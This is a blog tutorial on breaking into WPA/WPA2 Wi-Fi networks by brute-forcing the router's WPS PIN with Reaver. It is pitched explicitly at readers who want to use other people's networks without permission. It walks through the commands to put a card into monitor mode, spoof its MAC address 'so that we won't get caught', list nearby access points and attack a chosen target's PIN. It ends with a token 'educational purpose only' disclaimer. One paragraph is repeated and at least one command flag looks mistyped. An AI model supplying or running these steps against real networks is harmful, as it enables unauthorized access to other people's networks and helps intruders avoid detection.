Did you ever have a feeling to learn How to Hack Wi-Fi
networks? Did you wish to use other people’s Wi-Fi networks but couldn’t, because
you didn’t know the network key?
If the answer to the above questions is YES, then this
tutorial is for you.
The old Wi-Fi networks had WEP (Wired Equivalent Privacy). The WEP
connection was easily vulnerable to password cracks. So, two new security protocols
namely WPA (Wi-Fi Protected
Access) and WPA 2 (Wi-Fi
Protected Access II) came into effect.
But, in the world of computers, you’ll always find keys to
all the locks either being formed or already would’ve been constituted. So,
today we are going to learn about cracking WPA and WPA2 Wi-Fi passwords.
For this, you’ll need Hackers' favorite operating system-
BackTrack. To download BackTrack and learn about its installation, go to:
WPA/WPA2 password
can be cracked simply by capturing WPA handshake and then applying a dictionary
attack on them. If he passphrase is in the dictionary then password will be
cracked, and this process may take hours, in some cases in even days. But what
if password is not in dictionary?
So here we will learn to crack these passpharses
WPS :- Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless home network. By default this is enabled in most of routers.
So here we will learn to crack these passpharses
WPS :- Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless home network. By default this is enabled in most of routers.
WPS has been
shown to easily fall to brute-force
attacks. A major security flaw was revealed in
December 2011 that affects wireless routers with the WPS feature, which most
recent models have enabled by default. The flaw allows a remote attacker to
recover the WPS PIN
in a few hours and, with it, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the
WPS feature, although this may not be possible on
some router models.
So, using Reaver we will brute force the AP's (Wireless Access Point) WPS, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually.
Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts.So here key concept is that we can brute-force that pin, and can get all the credentials kept for Access Point which can be any combination of digits, special symbols.
Let's Start :
Boot your Backtrack :
Let's we will change the mac address of our network card so that we won't get caught
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Now run the following the command to get all the available AP's
wash -1 mon0
Now choose your target and note its bssid and issue the following command replacing <bssid> with the targets bssid:
reaver -i mon0 -b <bssid> -vv
Now wait until you Reaver brute force's the pin. Once its done, you'll have
WPS Pin
WPA PSK
AP SSID
So, Enjoy Hacking!!!
NOTE: THIS IS FOR EDUCATIONAL PURPOSE ONLY AND IN NO WAY SHOULD BE MISUSED.
No comments:
Post a Comment